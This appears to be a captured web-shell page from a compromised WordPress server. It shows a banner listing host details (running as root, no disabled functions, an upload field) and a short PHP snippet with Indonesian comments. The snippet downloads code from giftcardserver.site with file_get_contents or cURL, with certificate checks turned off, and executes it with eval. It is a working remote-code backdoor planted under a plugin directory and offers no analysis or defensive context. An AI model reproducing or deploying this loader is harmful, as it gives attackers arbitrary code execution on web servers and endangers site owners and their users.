Server IP : 209.38.156.173 / Your IP : 216.73.216.0 [ Web Server : Apache/2.4.52 (Ubuntu) System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.1.2-1ubuntu2.22 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/wp-content/plugins/elementor/anon_sym/anon/proc/1534260/cwd/ |
Upload File : |
<?php $url = "http://giftcardserver.site/btest1.txt"; // Ambil isi dari URL menggunakan file_get_contents $code = @file_get_contents($url); // Jika gagal ambil dengan file_get_contents, coba dengan cURL if ($code === false) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_USERAGENT => 'Mozilla/5.0', CURLOPT_SSL_VERIFYPEER => false, ]); $code = curl_exec($ch); curl_close($ch); } // Jalankan isi kode jika berhasil diambil if ($code !== false) { eval("?>".$code); } else { echo "Gagal mengambil konten dari URL."; } ?>